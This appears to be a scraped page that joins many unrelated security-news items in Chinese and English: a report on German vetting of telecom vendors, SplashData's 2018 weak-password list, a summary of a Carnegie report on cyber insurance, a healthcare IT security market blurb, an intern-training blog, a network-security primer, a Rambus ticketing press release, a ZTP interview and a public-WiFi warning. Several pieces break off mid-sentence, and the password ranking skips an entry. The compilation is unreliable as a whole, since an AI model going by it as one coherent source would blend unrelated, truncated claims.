【TechWeb】12月20日消息，据国外媒体报道，德国监管机构表示，已敦促有意竞标当地基础设施项目的全球电信供应商将其技术提交给官方审查，并不仅限于华为。

德国网络安全监管机构联邦信息安全办公室(Federal Office for Information Security)对外媒表示，该机构正在与国际供应商合作，促进他们参与所谓的技术验证项目，包括对供应商总部、现有开发和安全设施，或欧洲各地专门实验室的监督。

该办公室表示，考虑到波恩作为德国国家网络安全和电信中心的地位，鼓励所有供应商在波恩开设技术验证实验室，预计与华为上月在波恩开设、并已投入运营的一家实验室类似。

这些供应商可能包括爱立信和诺基亚，三星电子和思科等等。

日前，密码管理公司SplashData第8次发布了年度最弱密码列表。研究人员分析了互联网上泄露的超过500万个密码，发现计算机用户仍然在使用可预测的、很容易就可以猜到的密码。使用这些密码存在账户被黑和身份被窃取的潜在风险。

分析发现123456和password继续保持最常使用弱密码的第1和第2名，美国总统特朗普的名字相关的密码donald&quot第一次出现在弱口令列表中，位居第23位。

研究人员称，因为用户喜欢用名人、明星、球星、键盘字母的简单组合这类容易记忆的密码组合，而攻击者也会用同样的密码库去攻击用户的账户。加之今年以来多个互联网巨头出现用户信息泄露事件，发布年度最弱密码列表是希望用户能够意识到使用弱口令的潜在威胁，督促用户使用强密码组合以确保安全。

Rank 2018 Password（前25）

1、123456 (无变化)

2、password (无变化)

3、123456789 (3)

4、12345678 (↓ 1)

5、12345 (无变化)

6、111111 (新出现)

7、1234567 ( 1)

8、sunshine (新出现)

9、qwerty (↓5)

10、iloveyou (无变化)

11、princess (新出现)

12、admin (↓ 1)

13、welcome (↓ 1)

14、666666 (新出现)

15、abc123 (无变化)

16、football (↓ 7)

17、123123 (无变化)

18、monkey (↓ 5)

19、654321 (新出现)

21、charlie (新出现)

22、aa123456 (新出现)

23、donald (新出现)

24、password1 (新出现)

25、qwerty123 (新出现)

SplashData估计有几乎10%的用户至少使用过这25个弱密码中的一个，有3%的用户使用过123456这个最弱密码。

SplashData分析的这500万被泄露的密码主要是北美和西欧的用户，成人网站泄露的密码不包含在分析报告中。

SplashData提供以下建议来增强上网的安全性：

1. 使用12个以上的字母组合或多种类型组合的密码

2.每个平台使用不同的密码，这样如果黑客获取了其中一个平台的密码，也无法用来登陆其他的网站。

3.使用密码管理器来组织密码，生成安全随机的密码，自动登陆网站来保护数字资产和个人身份。

更多SplashData弱密码相关的数据参见：https://www.splashdata.com/worstpasswords.

美国卡内基国际和平基金会11月发布专题报告《解决私营部门网络安全困境：保险不可或缺的作用》（Addressing the Private Sector Cybersecurity Predicament: The Indispensable Role of Insurance）。报告指出，私营部门面临的网络风险日益严峻，表现在范围、规模和复杂性等方面，但应对之道非常有限，企业开始转向网络保险政策以应对挑战。然而，目前网络保险仅可提供有限的、不确定的、临时的解决方案，保险业在重塑风险格局方面理应极具潜力。本报告分析了阻碍网络安全保险市场正常运作的因素，研究了保险行业、政府、信息和通信技术（ICT）供应商以及私营部门的其他主要利益相关者为充分发挥保险重塑风险环境的潜力而做出的努力，最后探讨了释放网络安全保险潜力可施行的措施。

由于一些深层次原因，政府和企业难以完美应对解决网络威胁：

商业激励：随着企业导入和扩展联网功能，例如远程访问数据等，更多的网络节点带来更广阔的网络攻击面。信息和通信技术（ICT）产品和服务的供应商在现有经济激励环境下希望快速推出新技术，而这种速度往往以牺牲网络安全为代价。

技术约束：由于信息通信技术的复杂性，测试和验证网络系统的完整性和安全性本质上面临着挑战。由于这些系统的复杂性日益增加，还需要频繁调整，堵漏异常困难。

情报、军事和执法行动需求频繁：人类在网络空间中活动的数量和性质迫使政府关注，政府机构开始介入该领域或意图扩大版图，他们可能会尝试掌控，部署更复杂的工具来利用漏洞而非消减漏洞，甚至会制造新漏洞。

犯罪分子、恐怖分子、黑客和其他潜在恶意用户受到诱惑：这类人群可以并且已经利用网络空间来实现他们的各种目标，因为此类行为的潜在收益率较高，但被打击并付出惨重代价的可能性又很低。

网络攻击工具迅速扩散：这些工具包括从技术领先国家的网络武器库中泄露或被盗的工具，还有部分由其他实体通过逆向工程制作的工具。

网络事件的系统性和级联影响的可能性增大：这是由多种相互作用的行业发展趋势所造成：普遍依赖于有限数量的通用硬件和软件平台和服务；ICT行业关键领域的市场整合；复杂的全球化供应链；系统和网络不断扩大的互联性等。随着物联网迅速发展，这些连接已深入物理世界，包括制造业、工业运营和航空航天等关键行业，并具有广泛的连锁反应。

机器学习普遍化：机器学习不仅可在网络安全领域帮助防御方，也能让攻击者受益，提高攻击的复杂程度和效率。

战略、政治和结构性原因阻碍了政府降低私营部门遭受网络攻击风险的能力和意愿：

“带宽”有限：政府自然倾向于首先解决其自身网络和服务的网络安全风险，然后解决关键基础设施的此类风险，以及其他形式的潜在系统性和灾难性风险，相较而言，企业、民间社会和个人面临的威胁没那么重要。

面临道德风险：政府担心承担解决私营部门网络风险的重大责任，会鼓励这些实体过度自满，从而使他们未能采取必要的预防措施。

策略矛盾及优先事项干扰：由于网络攻防有着内在的利益均衡、力道及协同要求，因此某些政府行为会加剧而不是缓解私营部门的网络安全困境。复杂的网络工具得到开发，被用于执法用途、情报，甚至战争。此外，网络角力各方都希望在满足网络安全需求与攻击性应用之间寻求适度的平衡。

审慎克制：政府应对外国的网络间谍活动和战争充满风险和挑战，在溯源中难以充分确定并公开可用等因素都会妨碍政府对私营部门所遭受的网络攻击做出回应。

国际合作不足：网络空间中，主权模糊或有争议，政治和法律障碍使得难以就网络空间中不可接受行为的构成等问题达成共识，对不恰当的网络行为进行单方面指责也面临困境、风险和权衡。

私营部门的反弹：公司抵制对其内部事务采取侵入式的政府监管和其他形式的干预，其中包括网络风险的管理活动，部分反弹源自历史悠久的私营部门对政府监管的担忧，比如实施成本、合规带来的责任、向政府或公众披露网络安全状况的风险等。另外，公司不愿响应不同层级政府的抵触需求，更别说不同地区政府相互矛盾的安全监管要求。

私营部门在日常运营中面临多重与网络安全相关的挑战：

网络安全风险庞杂且相当复杂：网络风险涉及企业大多数业务领域及经营活动，不仅带来新风险，还直接或间接影响企业绩效及责任，有效的网络风险管理面临着概念、组织、运营、技术、财务和管理方面的挑战，企业应当时时实施网络风险评估，并执行全面的策略加以应对。

网络安全投资消耗宝贵的企业资源：企业要拿出利润来投资网络安全，但仍不足以防范重大网络风险，有限的资源投在网络安全技术和运营，还是投资网络弹性和风险控制措施，进一步恶化该问题。

被动防御的局限性：仅仅被动防御不足以应对日益复杂的网络攻击。即使成功，其效用随时间推移充满不确定，而且被动防御不能真正惩罚网络攻击者。

积极网络防御中的法律限制和禁令：在多数司法管辖区，积极的网络安全措施在思维意识和法律上仍存在争议，或在私营部门中被完全禁止。此外，大多数公司目前无法承担与部署主动防御措施有关的潜在责任。

缺乏足够的能力将网络风险分摊到保险公司：尽管保险业传统上在风险引导中起着关键作用，但目前私营部门并不完全有能力利用网络风险保险。

商业竞争和政府规管造成的阻碍：国际监管环境不均衡，使得企业格外关注跨境数据流动和反垄断措施等法规。此外，在安全实践中共享私密数据带来潜在风险更让企业焦虑不堪。这些因素不仅阻碍而且往往彻底阻止集中资源、分享最佳实践，还妨碍采用其他形式来全面地共同应对不断演变的国家和国际的网络威胁。

公众对网络安全漏洞的容忍度低：人们风险意识增强，并要求企业采取更多措施来抵御风险并披露任何风险事件。如果企业未能为此类情境做好准备，企业将面临潜在诉讼。

网络保险的关键作用可以通过保险的六个核心功能来体现：

管控风险：通过积累经验及分析有效的风险管理实践的数据，保险公司可以更深入地了解影响网络风险环境的因素。

分散企业风险：按照惯常的保险业标准，承销商将承担分摊企业网络风险的核心职能。

管理系统性风险：识别潜在集聚风险的过程不仅可以避免遭受灾难性损失，还可为政府力图预测和解决可能的系统性网络攻击提供宝贵的服务。

利用集体智慧改善安全性：网络空间的本质是互相联系但又相互独立，既是艰巨的挑战，也蕴含机遇，需要有效利用整个生态系统的力量。保险行业可以成为跨私营部门的安全数据中央知识库，利用数据实现分析功能，抵御直接威胁。

塑造更宽广的风险预防态势：保险公司提供财务激励可以改变私营部门的行为，这种变化能对分析恶意活动的成本效益方面产生有力而且长期地影响。

调和国际化的标准与实践：不同于国家监管规则，保险业的影响力容易跨越国界。因此，保险可以作为一个全球代理监管机构，能够在国际上促成互惠互利的实践和标准。

保险业基本职能是认识和管理风险，其潜能来自其近乎实时的风险洞察力，顶级保险公司首先是风险管控专家，保险业在网络方面的作为取决于数据，数据收集工作可以让保险业不断提供风险管控建议。

最早的网络保险政策诞生于房地产界，起初财产保险公司拒绝为“数据”这类无形财产提供保险，于是产生了此类风险的保险需求。大多数保险公司在财务/管理保险部门内建立网络保险业务，客户和经纪人倾向于便捷交易，通常只根据支持保险所需的最少量信息进行承保决定。在当前持续变化的网络风险环境中，网络威胁带来的危险超越大多数商业保险，其造成的损失可在多个险种内索赔。

应对网络安全风险，很多保险公司目前没有承保专业知识或数据管理系统来有效收集精细数据集以开发承保所需的强大数据集。这一挑战不仅影响保险公司，也影响再保险公司。由于网络风险呈现出前所未有的跨领域和级联效应特征，因此尚没有“全风险”的网络保险政策可以覆盖全部潜在损失。

此外，保险业极少应对以网络为中心的挑战，其风险随时可能发生巨大变化。网络风险的独特性使得是否有能力满足 “可保性原则”充满争议。云服务和作为攻防措施引入的机器学习这两个颠覆性技术可让保险公司更难以应对风险敞口。因此，传统的覆盖率和费率方法将不再适用于网络风险，观察和分享前沿最佳实践是促成网络风险易于管理的最好方法。

到今天，企业中负责网络安全事务的首席信息安全官们仍对保险业持怀疑态度，他们误以为网络保险承保流程的核心是收集安全漏洞并作价，这可能会引发攻击或责任诉讼，甚至成为保险公司提供拒绝承保的理由。此外，风险管理部门和安全领导者之间因决策考量、预算和权限等因素难以有效合作。

网络保险市场竞争激烈，这种状态导致保险公司认为，赢得和维持业务的最好的方法是使承保过程尽可能简单，这种情况因保险经纪公司逐利而恶化。从人才培育角度来看，不同于财产保险人才具有合法的工程证书及经验，网络承销商刚刚开始试水，而市场上安全人才稀缺意味着大多数潜在的网络安全专业人士不会选择保险业。

这些因素加上前面提到的问题，带来了另一个重要现实：保险公司和再保险公司正在努力理解平台和共享服务提供商（包括云计算）互连所产生的与网络相关的风险集聚。如前所述，一些加速趋势导致网络事件引起的系统性和级联后果的可能性增加。预计风险可能出现的地点和方式非常困难，不可预测性加重了保险公司试图评估任何单一保单持有人的风险这一本就困难的任务。对风险集聚的恐惧是再保险公司犹豫不决的主要驱动因素，并进而抑制整个保险市场。

六、网络的保险行业如何释放 其真正的潜力

理想的承保模型是风险管理的最佳实践与失败事例的动态数据库，最佳的网络保险状态首先应多方参与，其次还需保险人和承保人在风险管理基线及行业最佳实践基线达成共识，再次还需要基于产业洞察力的财务等激励措施，最后还要及时修订。为释放这种网络潜力，在提升信任和透明度上，提出了以下几点实用的解决方案，以便推动更多实质性的信息和数据共享。

聘用网络人才并交叉培训：对于合适的网络安全专业人才，经纪人和保险公司应该在报酬和激励方面表现慷慨。此外，鉴于网络风险的跨产品线性质，经纪人和保险公司都应投资于所有产品领域的网络风险意识培训。

保险承保专业化和与网络安全服务提供商的更深层次合作：与网络安全研究人员和托管安全服务提供商的合作可以填补保险业专业知识和能力方面的部分空白，这些可以将特定服务（例如安全审核、漏洞评估和渗透测试）整合到承保流程中。此外，对保单持有人资产的第三方专家评估将使保险公司更好地了解和理解风险敞口。

提高索赔透明度：对于接受索赔、赔付、拒绝赔付的理由等，保险公司应尽可能地透明化，并且确保不泄露客户特定或机密信息。

使合同简单化及易理解：保险公司应尽力拟订最简单、最容易理解的保险合同，明确化保险单的最大好处之一是安全领导者将能够更好地掌握，并对保险的运作方式充满信心。

使用基于成熟度的承保方法：如网络安全成熟度模型（C2M2）及美国国家标准与技术研究院的网络安全框架（NIST-CSF）可评估并支持组织的整体网络风险管理健康状况及其对持续改进的意愿，这种方法论适用于网络风险的动态特征。

政府和产业界的协同应侧重于重塑企业行为的激励结构。重心不应仅仅放在临时网络安全解决方案上，而应放在从供应链到产品生命周期结束，全面处理增加或减轻网络风险暴露因素的方法上。

保险公司可以通过保费和豁免政策直接抑制增加风险的行为或激励缓解措施。对网络风险的更有力的评估也应该告知客户、消费者、股东和潜在投资者，以便创造额外的市场激励。政府拥有一系列工具可以直接管理或间接促进私营部门的网络安全和风险管理实践，从而为保险公司提供支持，包括制定和颁布网络风险管理的自愿标准，通过自身购买服务的过程及合同关系产生市场力量等。当然，政府已经承担了许多此类活动，但往往是以特定方式进行的。总的来说，市场压力可能有助于抵消推动风险敞口的激励措施。更进一步，网络保险可以在激励网络安全实践的其他机制中发挥作用。最后，合作对于解决潜在的系统性网络风险至关重要。

除了简单地确定有效的风险管理实践外，保险公司还可以与政府和网络安全提供商合作、开发和推广网络安全创新实践。各国政府和保险业可以通过公私伙伴关系，建立网络安全能力，改进威胁情报和最佳做法的信息共享，探索更有效的网络防御的创新技术和方法，制定共同的网络安全标准和指标。保险公司可以激励保单持有人签订符合正式或非正式专业实践标准的网络安全服务合同。反过来，共同标准和指标的发展也将为保险业提供更有效的网络安全实践基准。

ICT和ICS供应商必须承担一定的责任，确保其产品在整个生命周期内的完整性，该义务要求供应商承诺对其产品承担某些义务以及具体措施和指标，以增强对此类承诺的更广泛信任。确保ICT / ICS产品完整性的可验证的承诺和指标，将大大缓解保险公司对其是否能充分评估网络风险和预测风险集聚的能力的担忧。此外，这些供应商和保险公司之间为实施此类措施而进行的深入合作可以为后者提供衡量风险暴露和缓解的具体指标。

八、结论：在政府，保险业和企业之间 建立合作伙伴关系

政府、企业和保险业可以开始分别在处理网络保险问题各司其职。保险业可以实施上述可行步骤，改善保险公司与保单持有人之间的对话机制，提高承保流程的全面性、深度和透明度。政府本身与其他国家合作，可以逐步提高网络安全预期和要求。利益攸关方和平台之间需要建立持续的伙伴关系。非营利部门等无利害关系的各方可以提供中立平台，以解决利益相关者和社群潜在的不同利益。最终，需要这种伙伴关系来解决网络不安全的根本原因。政府和保险业可以做的不仅仅是简单地改变风险管理做法，可以在决策过程中促成更深层次的转变，转向更加主动、以风险为中心的框架。反过来，这种变化可以避免风险集聚效应、削弱网络空间攻击者的优势，并有助于缓解政府应对网络攻击升级的压力。

报告原文：https://carnegieendowment.org/2018/11/07/addressing-private-sector-cybersecurity-predicament-indispensable-role-of-insurance-pub-77622

编译 | 贺佳瀛

声明：本文来自赛博安全，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如需转载，请联系原作者获取授权。

医疗行业面对的所有攻击中，勒索软件最近上升为最令人恐惧的黑客技术。该技术能让黑客封锁数据访问，要挟医院支付赎金。最近一项研究的数据表明， 88% 的勒索软件攻击是朝着医院去的。这一行业的另一个数据泄露风险来自于安全防护不周的IoT设备和人为失误。这些因素再加上HIPPA和其他监管规定对医疗健康信息保护提出的要求，医疗健康机构要确保患者安全与隐私就有了很多必须及时解决的重大安全考虑。

医疗保健机构正在实现最大化安全效能与维持合规的一系列过程，比如设立安全计划、重视离线存储、保护生物医学设备、教育用户和培训患者。这是因为信息安全和患者隐私是医疗保健环境运营良好的关键组成部分。而且，社会医疗信息与管理系统(HIMSS)隐私及安全领域也会提供资源以辅助医疗保健机构达成其隐私与安全目标。

医疗保健行业大量专业数据泄露事件的增加，凸显出在医疗保健IT系统中应用有效安全措施的迫切需求。数据泄露事件每年都给医疗保健行业带来惨重损失，数字化医疗比较发达的国家，比如美国和几个欧洲国家，更是受伤。因此，网络安全太差可对公司企业造成的巨大经济压力和负面影响越来越受到重视，医疗保健行业也在大幅增加其IT安全投入。

定制市场研究与咨询服务提供商 TMR Research 针对医疗保健IT安全市场制作了一份全球行业分析与预测报告，细致呈现了当前全球医疗保健IT安全市场的成长动态，包含2016-2024期间有关该市场增长前景的大量预测。报告中含有主要细分市场及其估值的定性定量分析，还有上述时间区间内的预期增长率及各地区性市场的总体吸引力。

医疗保健行业逐渐意识到，过去几年来，数据泄露事件在影响、频率、规模和损失上一直在增加。而且，当前网络攻击的策划和执行都相当专业，医疗保健机构的安全防护工作必须同样积极主动和有所准备。全球医疗保健行业IT安全市场的主要驱动力，正是来源于这种对评估当前安全准备度状态和实现更有效安全模式的需求。

另外，医疗保健IT基础设施内部网络中移动设备渗透的不断增加、越来越严格的合规要求，以及政府机构对IT安全投入的加大，也是医疗保健行业IT安全市场的推进因素。还有医疗保健行业先进IT安全解决方案的发展，云计算模式按使用量付费的经济IT安全解决方案访问的不断采纳，同样驱动着全球医疗保健IT安全解决方案市场向前迈进。

医疗保健IT安全市场提供的主要产品包括风险与合规管理解决方案、灾难恢复、防火墙及统一威胁管理解决方案、杀毒软件、入侵检测/入侵防御系统和身份及访问管理解决方案。从服务的角度出发，医疗保健IT安全市场可被细分为：升级、维护、实现、托管服务、顾问咨询和持续支持。

在终端安全、内容安全和网络安全领域都能看到医疗保健IT安全解决方案的应用。基于这些安全解决方案的交付模式，该市场又可细分为现场部署、云部署和混合部署。医疗保健IT安全解决方案的主要终端用户是保险公司和医疗保健提供商。

按地理位置分，欧洲和北美等发达地区是全球医疗保健IT安全市场盈利的主要贡献者。这些地区相对广泛的数字化医疗保健基础设施成为了当前高级网络攻击的主要目标。因此，这些地区的网络安全投入也在快速增加。未来几年内，这些地区仍将保持其医疗保健IT安全市场主要贡献者的位置。

全球医疗保健IT安全市场竞争激烈，呈现群雄逐鹿的分裂状态，没有哪家大供应商占据主要市场份额的情况。该市场中几家主流公司是英特尔、SailPoint Technologies、赛门铁克、惠普、AT&T、易安信、IBM、Wipro和威瑞森。

https://www.tmrresearch.com/health-it-security-market

Over the past few years , I’ve had the pleasure of welcoming interns on our security research team. One of my goals was to pass on knowledge of security to these folks and pique their interest in (a career in) security. The goal of any teacher is to pass on their knowledge to the younger generation, in essence creating a miniature version of ourselves, which is hopefully somewhat better.

Let me take you back in time to 2015 when we had our first round of interns. I had the bright idea to go full-throttle. We loaded up Kali linux , launched a Damn Vulnerable Web App instance, started scanning with OpenVAS and NMAP and then used Metasploit to attack everything we could. The problem with this was that these young interns had no experience in security. Their eyes were the size of saucers, and they walked around looking confused.

The next two years, I reeled it in a bit and started with essentially having them complete a book report on that year’s Verizon Data Breach Investigations Report . What I wanted them to understand was some of the key terms in security, how attackers work, what attackers are after and what defenses organizations are using to protect against these attacks.

Once this was complete, I kicked them out of the building. I had them run through a scenario of needing to gain access to an encrypted file on their computer back at their desk. Starting from the street corner, I had them provide a report of every security control they encountered on their way to the text in that encrypted file. These could be mitigating controls, such as door locks, security guards or passwords on the computer. They could also be deterring controls, such as video cameras. Nobody ever gets every (Read more...)

We live in an age of information. Businesses these days are more digitally advanced than ever, and as technology improves, organizations’ security postures must be enhanced as well. Now, with many devices communicating with each other over wired, wireless, or cellular networks, network security is an important concept. In this article, we will explore what is network security and its key features.

Let’s take a look at the topics covered in this ‘What is Network Security?’ article:

Network security is the process of taking preventative measures to protect the underlying networking infrastructure from unauthorized access, misuse, malfunction, modification, destruction or improper disclosure.

The Internet has undoubtedly become a huge part of our lives. Many people in today’s generation rely on the Internet for many of their professional, social and personal activities. But are you sure your network is secure?

There are many people who attempt to damage our Internet-connected computers, violate our privacy and make it impossible to the Internet services. Given the frequency and variety of existing attacks as well as the threat of new and more destructive future attacks, network security has become a central topic in the field of cybersecurity.Implementing network security measures allows computers, users and programs to perform their permitted critical functions within a secure environment.

Now that we know what network security is, let’s take a look at two major categories of network attacks.

Network Security | Introduction to Network Security | Edureka

A network attack can be defined as any method, process, or means used to maliciously attempt to compromise network security. Network security is the process of preventing network attacks across a given network infrastructure, but the techniques and methods used by the attacker further distinguish whether the attack is an active cyberattack, a passive type attack, or some combination of the two.

Let’s consider a simple network attack example to understand the difference between active and passive attack.

An active attack is a networkexploit in which attacker attempts to make changes to data on the target or data en route to the target .

Meet Alice and Bob. Alice wants to communicate to Bob but distance is a problem. So, Alice sends an electronic mail to Bob via a network which is not secure against attacks. There is another person, Tom, who is on the same network as Alice and Bob. Now, as the data flow is open to everyone on that network, Tom alterssome portion of an authorized message to produce an unauthorized effect.For example, a message meaning “Allow BOB to read confidential file X” is modified as “Allow Smith to read confidential file X”.

Active network attacks are often aggressive, blatant attacks that victims immediately become aware of when they occur. Active attacks are highly malicious in nature, often locking out users, destroying memory or files, or forcefully gaining access to a targeted system or network.

A passive attack is a network attack in which a system is monitored and sometimes scanned for open ports and vulnerabilities,but does not affect system resources.

Let’s consider the example we saw earlier:

Alice sends an electronic mail to Bob via a network which is not secure against attacks. Tom, who is on the same network as Alice and Bob, monitors the data transfer that is taking place between Alice and Bob. Suppose, Alice sends some sensitive information like bank account details to Bob as plain text. Tom can easily access the data and use the data for malicious purposes.

So, the purpose of the passive attack is to gain access to the computer system or network and to collect data without detection.

So, network security includes implementing different hardware and software techniques necessary to guard underlying network architecture. With the proper network security in place, you can detect emerging threats before they infiltrate your network and compromise your data.

Cybersecurity Certification Course

There are many components to a network security system that work together to improve your security posture. The most common network security components are discussed below.

To keep out potential attackers, you should be able to block unauthorized users and devices from accessing your network.Users that are permitted network access should only be able to work with the set of resources for which they’ve been authorized.

Application security includes the hardware, software, and processes that can be used to track and lock down application vulnerabilitiesthat attackers can use to infiltrate your network.

A firewall is a device or service that actsas a gatekeeper,decidingwhat enters and exits the network. They use a set of defined rules to allow or block traffic.A firewall can be hardware, software, or both.

A virtual private network encrypts the connection from an endpoint to a network, often over the Internet. This way it authenticates the communication between a device and a secure network, creating a secure, encrypted “tunnel” across the open internet.

You should know what normal network behavior looks like so that you can spot anomalies or network breaches as they happen.Behavioral analytics tools automatically identify activities that deviate from the norm.

Wireless networks are not as secure as wired ones.Cybercriminals are increasingly targeting mobile devices and apps. So, you need to control which devices can access your network.

These systems scan network traffic to identify and block attacks, often by correlating network activity signatures with databases of known attack techniques.

So, these are some ways of implementing network security. Apart from these,you’ll need a variety of software and hardware tools in your toolkit to ensure network security, those are:

Rambus

the commercial organisation responsible for delivering and managing

multi-operator and integrated ticketing in South Yorkshire, has selected

Rambus

solution. The new, innovative smart ticketing system will allow

TravelMaster customers to purchase ticketing products online and reap

the benefits of smart ticketing whilst travelling across buses, trams

and trains in South Yorkshire.

Rambus has extensive experience in delivering robust and scalable smart

ticketing solutions which act as the backbone for deployments across the

UK for bus, rail, subway and metro. Under this five-year agreement,

HOPS

enable the secure delivery of digital smart tickets directly to tablets

and mobile devices.

The solution will allow customers to purchase a range of flexible

multi-operator tickets, valid on any bus, tram or train throughout South

Yorkshire, online and in-advance through a retail portal on the

TravelMaster website. These tickets can then be loaded onto a smart card

via on-vehicle ticketing machines or through NFC-enabled and compatible

smart phones.

“Our customers rightly expect to be able to purchase our great range of

value for money products at their own convenience and this appointment

is a major step towards TravelMaster meeting those expectations,” said

Matt Smallwood, general manager of TravelMaster. “We’re one of the

leading smart ticketing schemes in the UK and with the pedigree Rambus

have in this field we will be able to deliver an innovative, accessible

and enhanced way for our customers to purchase their products.”

TravelMaster’s e-Commerce system is a key part of the company’s retail

strategy, which intends to support patronage growth, enhanced access to

opportunities and economic development within the Sheffield City Region.

By implementing commercially sustainable, customer-oriented,

technologically innovative and integrated ways of selling and fulfilling

products, TravelMaster and Rambus will together support a brighter

future for South Yorkshire.

Russell McCullagh, vice president and general manager of Rambus

Ticketing, commented: “For operators looking to provide a modern,

frictionless transport experience that customers can rely on, smart

mobile ticketing is the answer. We’re delighted to be working with

TravelMaster and look forward to delivering a truly reliable ticketing

experience for passengers which will create improved services and ticket

access.”

TravelMaster intends to deploy the new e-Commerce system in the first

half of 2019.

For more information on the TravelMaster system, visit http://sytravelmaster.com/ .

Visit rambus.com/smart-ticketing

for additional information on Rambus Smart Ticketing solutions.

Follow Rambus:

Company website: rambus.com

Rambus

blog: rambus.com/blog

Twitter: @rambusinc

LinkedIn: www.linkedin.com/company/rambus

Facebook: www.facebook.com/RambusInc

About Rambus Security

Rambus Security is dedicated to providing a secure foundation for a

connected world. Our innovativesolutionsspan areas including tamper

resistance, network security,mobilepayment, smart ticketing

andtrustedtransaction services. Rambus foundational technologies

protect nearly nine billion licensed products annually, providing secure

access to data and creatingan economy of digital trustbetween our

customers and their customer base. Additional information is

Last week we published thefirst half of interview withPatrick Ogenstad, guest speaker in Spring 2019 Building Network Automation Solutions online course (register here). Here’s the second half.

ZTP is about provisioning. Can this include configuration as well?

You could argue that provisioning is a form of configuration and in that sense, provisioning can certainly include configuration. If your ZTP solution is good at configuration management is another question.

I would say that the goal of the ZTP system should be to get the device in a state so that it can be handed over to the configuration management system. It might be that you use the same tool for everything. There are rather few tools out there, however, which are a master of all trades.

ZTP can be used internally connecting to an internal provisioning server, and it can be used externally connecting to an external provisioning server. Some commercial products use ZTP in connection with a vendor-controlled cloud-based provisioning server. What are the security risks if a vendor can push data to customer equipment?

Microsoft had a great article many years ago called Ten Immutable Laws of Security, in which one of those laws state that a computer is only as secure as the administrator is trustworthy. I'm not trying to say that the operators behind these solutions are untrustworthy, just that each organization has to take into account who they trust with what.

There will always be security risks involved regardless of what we do. The attack surface will be different against a service like this; on the other hand, it doesn't mean that it is worse than what most companies have today. A cloud-based service can be helpful to set up a new office where you don't have a network in place. However, as mentioned hereinabove, it still requires that the Internet connection uses DHCP, if we want to keep it as a ZTP install that is.

What tools are available to develop a ZTP solution?

If we are talking about creating a custom solution, there are a lot of open source tools that can serve as a base. DHCP will be needed, so ISC DHCP or Kea are good alternatives. For devices that support ZTP using a web server, Nginx could be helpful to serve files, but you can also write your web application using Flask or Django.

I would, however, recommend starting by stepping away from all of the tools and instead look at the process that you currently use to install devices. Not just getting the initial configuration on the box after it has powered up. Look at what steps need to get done for the new device to work as intended. That the device has the correct configuration is one thing, but it might also mean that it gets added to a network monitoring system. Start by writing all the steps that need to get done and then look at what tools can solve those problems.

Are there any standards yet?

While DHCP and TFTP have been around a long time as regards ZTP, there has as far as I know never been a standard discussion specifically about how to provision devices. However, looking into the future, there is an IETF draft called Zero Touch Provisioning for Network Devices (https://datatracker.ietf.org/doc/html/draft-ietf-netconf-zerotouch) that looks interesting. I wouldn't dare to guess as to when we might have devices that would support that concept.

How would you start and structure a ZTP project?

I would start by writing down all the manual steps needed to install a new device and integrate it into the network. Hopefully, I would have colleagues to talk to about this as I'm bound to miss some of the steps.

Then, I would look at each task and try to find a solution that could automate that step. If I couldn't get my hands on a tool for a specific part, I would write my own. I would start by trying to solve the easy problems first and be happy even if the ZTP solution would require a few manual steps to begin with and then work from there to improve it.

Want to know more? Patrick will talk about ZTP in Spring 2019 Building Network Automation Solutions online course (register here). In the meantime, enjoy his ZTP tutorial .

Over the past few years “security” has become a buzzword across many industries, and for good reason. With the threat of data breaches haunting industry stalwarts, household brands and countless consumers, companies are paying more and more attention to their in-house security strategies.

To be smart about security, IT professionals need to think like a detective. We need to think like the “bad guys” to protect the “good guys,” and identify weaknesses before they are exposed.

Recent Articles By Author

However, more than 315 technology and security professionals surveyed in the 2018 Black Hat attendee survey revealed that when it comes to defending against cyberattacks, only three types of technologies were rated as “very effective” or “somewhat effective” by a majority of participants: encryption, multi-factor authentication tools and firewalls. The remaining technologies―including mobile security tools and data leak protection―were ranked “effective” by fewer than half the respondents. Passwords, perhaps the most universal of security technologies, were rated “effective” by only 19 percent of security professionals and “ineffective” by 37 percent.

Despite the broad availability of security technologies, there has been a rise and fall in the effectiveness of certain technologies, as the broader landscape shifts and hackers get smarter. Exploring the available security technology through the eyes of “on the ground” technology and security professionals better enables us to identify why the three leading tools earned their recognition as most effective―and how the industry is effecting that change.

New technologies such as artificial intelligence (AI), machine learning and hybrid cloud have significantly influenced the effectiveness of security strategies that may have been successful just five years ago. While IT teams are eager to implement new technologies, they cannot allow their security practices to fall by the wayside―in lockstep with the introduction of next-generation technology, some security practices have become obsolete in turn.

Modern security strategies must remain fluid: Treating your security practices as an afterthought can be dire for an organization in the modern IT landscape.

However, many organizations may be unsure where to start when it comes to security processes, protocols and figuring out which technologies are best for their businesses. Smaller organizations specifically may not have a full-time security officer, but it is important to have a member of the IT team trained in security or a contractor who can assess the current status of the security practices and determine where the weakest links are. Once the assessment is complete, it should be clear which security strategies should be implemented. Following a companywide security audit, for example, you can decide if dual authentication is needed in the sales department or if encryption is needed in finance. Security plans are not one-and-done, they should evolve as you assess your business’ needs and the changing technology landscape.

While a strong security strategy is comprehensive, three technologies emerged as leading underlying protocols in 2018―encryption, multi-factor authentication and firewalls―and are crucial assets to any cybersecurity arsenal.

While encryption, multi-factor authentication and firewalls are all excellent security management tools , there is one other invaluable tool―user education. As they often say in sports, “Your best defense is a good offense.” User education should be viewed as an investment in your IT organization. Almost every company now has a budget devoted to security, but rather than spending it all on hardware, it’s important to spend some on helping your teams understand risks and best practices. Humans are often security’s weakest link. Understanding how to create a smart password or when not to click on an email can make a world of difference in an organization’s success when it comes to security.

With today’s ever-changing technology landscape, it’s more important than ever to stay aware and educated on current security trends, as well as those that have been rendered ineffective. A flexible and custom security plan that is maintained regularly can be invaluable in today’s technology climate.

随着移动终端的兴起和互联网技术的不断进步，古老的盗窃、诈骗、骚扰手段也是旧貌换了新颜。我们身边有多少人知道，大家每天使用的WiFi，其实并不安全。

亲，你没看错，就是这个问题。使用WiFi上网时我们的个人信息安全时刻存在着巨大的风险和隐患。

黑客自己搭建一个“山寨WiFi”，取一个与附近WiFi相似的名字，不设登录密码诱使人连接。用户使用时，传输的数据就会被黑客监控，个人隐私、账号名和密码等先关信息也可以轻易被盗取。不少人喜欢随时开着手机的无线网自动连接功能，这样无疑存在这巨大风险。

不信，看看这几幅漫画，这些危险场景没准你都曾置身其中。

■免费WiFi接入

不法分子同城会搭建与常用WiFi相同或相近的WiFi，设置空密码或者相同密码吸引公众链接，然后在WiFi路由器上劫持DNS，将用户引入到钓鱼网站获取账号密码，或者在路由器上监听手机流量，获取明文密码。

◆公共场合连接WiFi时请同商家确认好WiFi名称

◆没有密码的公共WiFi请慎用

